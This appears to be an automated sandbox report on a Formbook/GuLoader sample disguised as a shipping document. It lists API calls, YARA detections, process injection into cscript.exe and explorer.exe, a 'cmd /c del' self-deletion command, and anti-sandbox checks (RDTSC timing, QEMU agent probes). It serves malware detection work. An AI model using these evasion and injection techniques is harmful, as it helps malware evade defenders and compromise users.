    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189B00 NtSetValueKey,1_2_1E189B00
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E18A3B0 NtGetContextThread,1_2_1E18A3B0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189820 NtEnumerateKey,1_2_1E189820
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E18B040 NtSuspendThread,1_2_1E18B040
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1898A0 NtWriteVirtualMemory,1_2_1E1898A0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189950 NtQueueApcThread,1_2_1E189950
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1899D0 NtCreateProcessEx,1_2_1E1899D0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_00564A5D NtProtectVirtualMemory,1_2_00564A5D
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_0056505B NtSetInformationThread,1_2_0056505B
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_00565077 NtSetInformationThread,1_2_00565077
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_00560878 NtProtectVirtualMemory,1_2_00560878
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_00560427 NtSetInformationThread,1_2_00560427
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_00564107 NtSetInformationThread,1_2_00564107
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_00563E60 NtSetInformationThread,1_2_00563E60
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_00564F47 NtSetInformationThread,1_2_00564F47
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_00564F4F NtSetInformationThread,1_2_00564F4F
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_00564F03 NtSetInformationThread,1_2_00564F03
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_00564F3F NtSetInformationThread,1_2_00564F3F
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9540 NtReadFile,LdrInitializeThunk,11_2_046F9540
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F95D0 NtClose,LdrInitializeThunk,11_2_046F95D0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_046F9660
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9650 NtQueryValueKey,LdrInitializeThunk,11_2_046F9650
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F96E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_046F96E0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F96D0 NtCreateKey,LdrInitializeThunk,11_2_046F96D0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9710 NtQueryInformationToken,LdrInitializeThunk,11_2_046F9710
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9FE0 NtCreateMutant,LdrInitializeThunk,11_2_046F9FE0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9780 NtMapViewOfSection,LdrInitializeThunk,11_2_046F9780
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9860 NtQuerySystemInformation,LdrInitializeThunk,11_2_046F9860
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9840 NtDelayExecution,LdrInitializeThunk,11_2_046F9840
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_046F9910
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F99A0 NtCreateSection,LdrInitializeThunk,11_2_046F99A0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9A50 NtCreateFile,LdrInitializeThunk,11_2_046F9A50
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9560 NtWriteFile,11_2_046F9560
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9520 NtWaitForSingleObject,11_2_046F9520
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046FAD30 NtSetContextThread,11_2_046FAD30
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F95F0 NtQueryInformationFile,11_2_046F95F0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9670 NtQueryInformationProcess,11_2_046F9670
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9610 NtEnumerateValueKey,11_2_046F9610
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9760 NtOpenProcess,11_2_046F9760
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046FA770 NtOpenThread,11_2_046FA770
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9770 NtSetInformationFile,11_2_046F9770
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9730 NtQueryVirtualMemory,11_2_046F9730
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046FA710 NtOpenProcessToken,11_2_046FA710
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F97A0 NtUnmapViewOfSection,11_2_046F97A0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046FB040 NtSuspendThread,11_2_046FB040
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9820 NtEnumerateKey,11_2_046F9820
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F98F0 NtReadVirtualMemory,11_2_046F98F0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F98A0 NtWriteVirtualMemory,11_2_046F98A0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9950 NtQueueApcThread,11_2_046F9950
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F99D0 NtCreateProcessEx,11_2_046F99D0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9A20 NtResumeThread,11_2_046F9A20
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9A00 NtProtectVirtualMemory,11_2_046F9A00
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9A10 NtQuerySection,11_2_046F9A10
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9A80 NtOpenDirectoryObject,11_2_046F9A80
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046F9B00 NtSetValueKey,11_2_046F9B00
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046FA3B0 NtGetContextThread,11_2_046FA3B0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041A060 NtClose,11_2_0041A060
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041A110 NtAllocateVirtualMemory,11_2_0041A110
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00419F30 NtCreateFile,11_2_00419F30
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00419FE0 NtReadFile,11_2_00419FE0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041A05B NtClose,11_2_0041A05B
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041A10B NtAllocateVirtualMemory,11_2_0041A10B
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00419EEA NtCreateFile,11_2_00419EEA
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00419F2A NtCreateFile,11_2_00419F2A
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00419FE2 NtReadFile,11_2_00419FE2
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E166E301_2_1E166E30
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E20D6161_2_1E20D616
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E212EF71_2_1E212EF7
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E211FF11_2_1E211FF1
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E21DFCE1_2_1E21DFCE
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E15841F1_2_1E15841F
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E20D4661_2_1E20D466
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E212D071_2_1E212D07
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E140D201_2_1E140D20
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E211D551_2_1E211D55
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1725811_2_1E172581
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E15D5E01_2_1E15D5E0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E2125DD1_2_1E2125DD
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1FFA2B1_2_1E1FFA2B
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E2122AE1_2_1E2122AE
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E212B281_2_1E212B28
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E16AB401_2_1E16AB40
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E17EBB01_2_1E17EBB0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E20DBD21_2_1E20DBD2
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E2003DA1_2_1E2003DA
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E21E8241_2_1E21E824
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E2010021_2_1E201002
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E16A8301_2_1E16A830
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E15B0901_2_1E15B090
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E2120A81_2_1E2120A8
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1720A01_2_1E1720A0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E2128EC1_2_1E2128EC
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E14F9001_2_1E14F900
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1641201_2_1E164120
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1699BF1_2_1E1699BF
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0477D46611_2_0477D466
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046C841F11_2_046C841F
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_04781D5511_2_04781D55
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046B0D2011_2_046B0D20
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_04782D0711_2_04782D07
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046CD5E011_2_046CD5E0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_047825DD11_2_047825DD
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046E258111_2_046E2581
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046D6E3011_2_046D6E30
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0477D61611_2_0477D616
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_04782EF711_2_04782EF7
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_04781FF111_2_04781FF1
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0478DFCE11_2_0478DFCE
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0478E82411_2_0478E824
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046DA83011_2_046DA830
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0477100211_2_04771002
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_047828EC11_2_047828EC
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046E20A011_2_046E20A0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_047820A811_2_047820A8
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046CB09011_2_046CB090
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046D412011_2_046D4120
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046BF90011_2_046BF900
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046D99BF11_2_046D99BF
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0476FA2B11_2_0476FA2B
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_047822AE11_2_047822AE
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046DAB4011_2_046DAB40
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_04782B2811_2_04782B28
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0477DBD211_2_0477DBD2
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_047703DA11_2_047703DA
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_046EEBB011_2_046EEBB0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041E1AE11_2_0041E1AE
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041EC9311_2_0041EC93
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00402D8711_2_00402D87
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00402D9011_2_00402D90
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00409E4011_2_00409E40
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00409E3B11_2_00409E3B
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041E77F11_2_0041E77F
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00402FB011_2_00402FB0
    Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 046BB150 appears 72 times
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: String function: 1E14B150 appears 72 times
    Source: AWB_&_Shipping Doc.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: AWB_&_Shipping Doc.exe, 00000000.00000002.227574850.000000000040A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNbedes5.exe vs AWB_&_Shipping Doc.exe
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.303381103.000000001E23F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB_&_Shipping Doc.exe
    Source: AWB_&_Shipping Doc.exe, 00000001.00000000.226821065.000000000040A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameNbedes5.exe vs AWB_&_Shipping Doc.exe
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297547518.00000000023C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs AWB_&_Shipping Doc.exe
    Source: AWB_&_Shipping Doc.exe, 00000001.00000003.295618720.0000000000A75000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs AWB_&_Shipping Doc.exe
    Source: AWB_&_Shipping Doc.exeBinary or memory string: OriginalFilenameNbedes5.exe vs AWB_&_Shipping Doc.exe
    Source: 0000000B.00000002.471972196.00000000006F8000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000B.00000002.473037289.0000000004BBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@7/0@3/3
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2296:120:WilError_01
    Source: AWB_&_Shipping Doc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: AWB_&_Shipping Doc.exeVirustotal: Detection: 11%
    Source: unknownProcess created: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe'
    Source: unknownProcess created: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe'
    Source: unknownProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe'
    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeProcess created: C:\Users\user\Desktop\AWB_&_Shipping Doc.exe 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe' Jump to behavior
    Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe'Jump to behavior
    Source: Binary string: cscript.pdbUGP source: AWB_&_Shipping Doc.exe, 00000001.00000003.295618720.0000000000A75000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP source: AWB_&_Shipping Doc.exe, 00000001.00000002.303381103.000000001E23F000.00000040.00000001.sdmp, cscript.exe, 0000000B.00000003.298334067.00000000044F0000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdb source: AWB_&_Shipping Doc.exe, cscript.exe
    Source: Binary string: cscript.pdb source: AWB_&_Shipping Doc.exe, 00000001.00000003.295618720.0000000000A75000.00000004.00000001.sdmp

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: Process Memory Space: AWB_&_Shipping Doc.exe PID: 6204, type: MEMORY
    Yara detected VB6 Downloader GenericShow sources
    Source: Yara matchFile source: Process Memory Space: AWB_&_Shipping Doc.exe PID: 6204, type: MEMORY
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_0040461D push edx; iretd 0_2_004045ED
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_00405E1F pushfd ; retf 0_2_00405F94
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_00403691 push B35EBC04h; ret 0_2_00403696
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_004064AF pushad ; ret 0_2_004064CA
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_00405740 pushad ; iretd 0_2_0040573E
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_0040575D pushad ; iretd 0_2_0040573E
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_00403B05 push 2B54F807h; ret 0_2_00403B0A
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_0040570A pushad ; iretd 0_2_0040573E
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_0040630F pushfd ; retf 0_2_00406320
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_004067CE push edx; ret 0_2_004067D6
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_004045E4 push edx; iretd 0_2_004045ED
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 0_2_00405FA7 pushfd ; retf 0_2_00405F94
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E19D0D1 push ecx; ret 1_2_1E19D0E4
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0470D0D1 push ecx; ret 11_2_0470D0E4
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00410854 push FFFFFFFDh; iretd 11_2_00410856
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041D0D2 push eax; ret 11_2_0041D0D8
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041D0DB push eax; ret 11_2_0041D142
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041D085 push eax; ret 11_2_0041D0D8
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041E109 push ss; retf 11_2_0041E113
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041D13C push eax; ret 11_2_0041D142
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041E186 push dword ptr [B2588A5Eh]; ret 11_2_0041E1A6
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0040E2C3 push ecx; retf 11_2_0040E2C6
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00408286 push ds; retf 11_2_0040828A
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041DABE push esi; ret 11_2_0041DACE
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_00416B0F push edx; ret 11_2_00416B1E
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 11_2_0041A796 push eax; retf 11_2_0041A79C

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Modifies the prolog of user mode functions (user mode inline hooks)Show sources
    Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE1
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeRDTSC instruction interceptor: First address: 00000000006340DA second address: 00000000006340DA instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F6200A526C8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp dl, cl 0x00000021 pop ecx 0x00000022 test edi, 83F80AC1h 0x00000028 add edi, edx 0x0000002a test ch, bh 0x0000002c dec ecx 0x0000002d cmp ecx, 00000000h 0x00000030 jne 00007F6200A526A6h 0x00000032 cmp dh, FFFFFFAEh 0x00000035 push ecx 0x00000036 call 00007F6200A526E6h 0x0000003b call 00007F6200A526DAh 0x00000040 lfence 0x00000043 mov edx, dword ptr [7FFE0014h] 0x00000049 lfence 0x0000004c ret 0x0000004d mov esi, edx 0x0000004f pushad 0x00000050 rdtsc
    Tries to detect Any.runShow sources
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: AWB_&_Shipping Doc.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Tries to detect virtualization through RDTSC time measurementsShow sources
